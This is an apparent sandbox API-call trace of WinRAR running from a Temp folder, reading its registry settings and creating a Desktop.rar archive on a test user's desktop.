Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarkey, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = Priority, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarreg.key, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Extraction False 1
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\5 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextWide, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextData, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Recovery, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveSymLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveHardLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Background, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WaitForOther, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Shutdown, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateArcName, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VersionControl, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = BLAKE2, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileCopies, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = QuickOpen, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateMask, data = yyyymmddhhmmss, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeMode, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileDays, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileHours, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileMinutes, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeOriginal, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeLatest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = mtime, data = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ctime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = atime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbs, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsNone, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbsDrive, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ImmExec, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcDoubleExt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcSubfolders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EmailArcTo, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PackDetails, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Module Load module_name = C:\Windows\system32\Crypt32.dll, base_address = 0x7fefdc00000 True 1
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptProtectMemory, address_out = 0x7fefdc316f8 True 1
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectMemory, address_out = 0x7fefdc3171c True 1
File Get Info filename = Desktop, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop, type = file_attributes False 1
File Get Info filename = Desktop.rar, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, type = file_attributes False 1
File Get Info filename = Desktop.zip, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.zip, type = file_attributes False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Compression False 1
File Create filename = Desktop.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Create filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Get Info filename = Desktop.rar, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, type = file_attributes False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtBMP, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtIcon, size = 2, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Window Create class_name = SysListView32, wndproc_parameter = 0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 6
System Get Info type = Operating System True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths False 9
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = Desktop.rar, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, type = file_attributes False 1
System Get Time type = Performance Ctr, time = 12872668189 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = SystemProgressBar, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = TaskbarProgressBar, data = 1, type = REG_NONE False 1
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
System Get Time type = Ticks, time = 10896420 True 1
System Get Time type = Ticks, time = 10896420 True 1
System Get Time type = Ticks, time = 10896420 True 1
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
System Get Time type = Ticks, time = 10896420 True 1
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CompareStringOrdinal, address_out = 0x77afd720 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
System Get Time type = Performance Ctr, time = 12929900214 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
System Get Time type = Performance Ctr, time = 12930018838 True 1
File Create filename = Desktop.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Create filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Create filename = Desktop.rar, desired_access = GENERIC_WRITE, GENERIC_READ True 1
System Get Time type = Ticks, time = 10896685 True 1
File Write filename = Desktop.rar, size = 8 True 1
File Write filename = Desktop.rar, size = 18 True 1
File Create filename = 0SoXJeVDMd8XB.wav, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10899337 True 1
System Get Time type = Performance Ctr, time = 13196364461 True 1
System Get Time type = Ticks, time = 10899493 True 1
